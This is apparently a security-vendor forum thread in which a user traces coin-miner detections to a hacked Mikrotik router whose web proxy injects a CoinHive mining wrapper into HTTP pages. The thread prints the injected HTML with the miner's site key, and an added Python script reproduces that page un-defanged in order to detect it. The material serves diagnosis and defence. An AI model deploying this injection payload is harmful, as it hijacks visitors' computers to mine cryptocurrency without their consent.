JS/CoinMiner.AH
Hi, 

We have a computer with more than 10,000 detected threats like the one below:

Threat: JS/CoinMiner.AH

Process: C:\Windows\System32\wscript.exe

Object: hxxp://10.100.1.254/adpb/registration?username=carlota&domain=MYDOM&hostname=TSDC10&action=login

Is this a sign that the computer is infected or this is the result of attempts to infect it?

Note: The address 10.100.1.254 is a Mikrotik router and it is updated with latest updates.

  • Administrators

In this case it's probably a local infection because of the wscript.exe process. Please gather logs with ELC on that machine and provide me with the generated archive.


You can find the source by creating a HIPS rule to block the startup of C:\Windows\System32\wscript.exe. Also make sure you log the event and set its type to "warning." This shouldn't cause any issues unless you have created any custom .js or .ws scripts.

If the HIPS log shows the source as svchost.exe, this could possibly indicate that a scheduled task is behind the activity. Unfortunately, the HIPS won't show what service is behind the activity.


On 8/31/2018 at 2:39 PM, Marcos said:

In this case it's probably a local infection because of the wscript.exe process. Please gather logs with ESET Log Collector on that machine and provide me with the generated archive.

Here are the collected logs on the affected machine.

Thanks for your help.

ees_logs.zip


I've been able to find the origin of these detections and have already solved the problem.

When I was trying to understand the origin of these trojans, I noticed that some of the addresses were legitimate and didn't raise any problems outside our client's network.

So I started a search for some kind of proxy that could inject malicious code into legitimate HTTP pages and found out that they had their Mikrotik router hacked to make every request made to port 80 go through the web proxy on port 8080, where the malicious code was injected and was later blocked on the client machine.

The hack has been possible because of this vulnerability in Mikrotik RouterOS: https://blog.mikrotik.com/security/winbox-vulnerability.html

I've changed every password, disabled the web proxy and deleted the firewall rule, so now everything is fine.

@itman, @Marcos Thanks for the tips


  • Administrators

We appreciate your feedback José. In other cases with different brands of routers, a factory reset followed by upgrading the firmware didn't help.


Here is the html source for the page that runs the miner:

<html>
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
	<title>"$(url)"</title> 
<_script src="https://coinhive.com/lib/coinhive.min.js"></script>
<_script>
	var miner = new CoinHive.Anonymous('ZopliillHRjWlp5B3JTrS4hKQP8jAKwp', {throttle: 0.2});
	miner.start();
</script>
</head>
<frameset>
<frame src="$(url)"></frame>
</frameset>
</html>

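The injection described in the thread (port 80 traffic NATed through the router's web proxy, which serves a wrapper page that loads the CoinHive miner and frames the URL the user actually asked for) can be checked for from the client side by fetching a plain HTTP page from inside the affected network and classifying what comes back. The script below is an added example, not code from the thread, from ESET or from Mikrotik. It embeds two constructed response bodies, a clean page and a copy of the wrapper posted above with the `<_script` defanging removed and `$(url)` filled in with the requested URL (an assumption about what the proxy serves live), and reports whether the CoinHive loader, the site key and the framing of the original URL are present. The site key is the one shown in the posted source; `example.com/news/` is a placeholder.

```python
"""Client-side check for the HTTP-injected CoinHive wrapper described in this thread."""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Markers taken from the wrapper page posted above: the CoinHive loader and the
# miner constructor carrying the attacker's site key.
COINHIVE_LOADER = re.compile(r"coinhive\.com/lib/coinhive(?:\.min)?\.js", re.I)
COINHIVE_CTOR = re.compile(r"CoinHive\.Anonymous\(\s*['\"]([A-Za-z0-9]+)['\"]")


class _PageCollector(HTMLParser):
    """Collect external script sources and frame targets from an HTML body."""

    def __init__(self):
        super().__init__()
        self.script_srcs = []
        self.frame_srcs = []
        self.has_frameset = False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "script" and attrs.get("src"):
            self.script_srcs.append(attrs["src"])
        elif tag in ("frame", "iframe") and attrs.get("src"):
            self.frame_srcs.append(attrs["src"])
        elif tag == "frameset":
            self.has_frameset = True


def _same_target(a, b):
    """True if two URLs point at the same host and path (trailing slash ignored)."""
    ua, ub = urlsplit(a), urlsplit(b)
    return (ua.netloc.lower(), ua.path.rstrip("/")) == (ub.netloc.lower(), ub.path.rstrip("/"))


def analyse_response(requested_url, body):
    """Classify the HTML returned for requested_url.

    Returns a dict with the verdict and the evidence behind it: whether the
    CoinHive loader is referenced, the site key passed to CoinHive.Anonymous
    (None if absent), and whether the page frames the URL that was requested,
    which is how the wrapper keeps the expected content on screen while mining.
    """
    page = _PageCollector()
    page.feed(body)
    loader = any(COINHIVE_LOADER.search(src) for src in page.script_srcs)
    match = COINHIVE_CTOR.search(body)
    site_key = match.group(1) if match else None
    wraps_original = page.has_frameset and any(
        _same_target(requested_url, src) for src in page.frame_srcs
    )
    return {
        "verdict": "injected" if (loader or site_key) else "clean",
        "loader": loader,
        "site_key": site_key,
        "wraps_original": wraps_original,
    }


# Constructed sample bodies (not captured traffic). The injected one is the
# wrapper from the post above with the "<_script" defanging removed and
# "$(url)" filled in with the requested URL, as the proxy is assumed to serve it.
REQUESTED_URL = "http://example.com/news/"

CLEAN_BODY = """<html><head><title>News</title>
<script src="/static/app.js"></script></head>
<body><h1>Today's news</h1></body></html>"""

INJECTED_BODY = """<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<title>"http://example.com/news/"</title>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('ZopliillHRjWlp5B3JTrS4hKQP8jAKwp', {throttle: 0.2});
miner.start();
</script>
</head>
<frameset>
<frame src="http://example.com/news/"></frame>
</frameset>
</html>"""


if __name__ == "__main__":
    for label, body in (("clean", CLEAN_BODY), ("injected", INJECTED_BODY)):
        print(label, analyse_response(REQUESTED_URL, body))
```

To use this against a live network, fetch the same plain HTTP URL once from a host behind the router and once from outside it (the thread notes the redirect only catches port 80, so an HTTPS fetch would not show the wrapper) and pass each body to analyse_response; a verdict of "injected" on the inside fetch alone points at the path, not the site.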

  • Administrators
20 minutes ago, MAGIK José Rocha said:

Here is the html source for the page that runs the miner:

Yes. That is exactly what triggers the detection and a screen shot of this was also included in the write-up mentioned above.
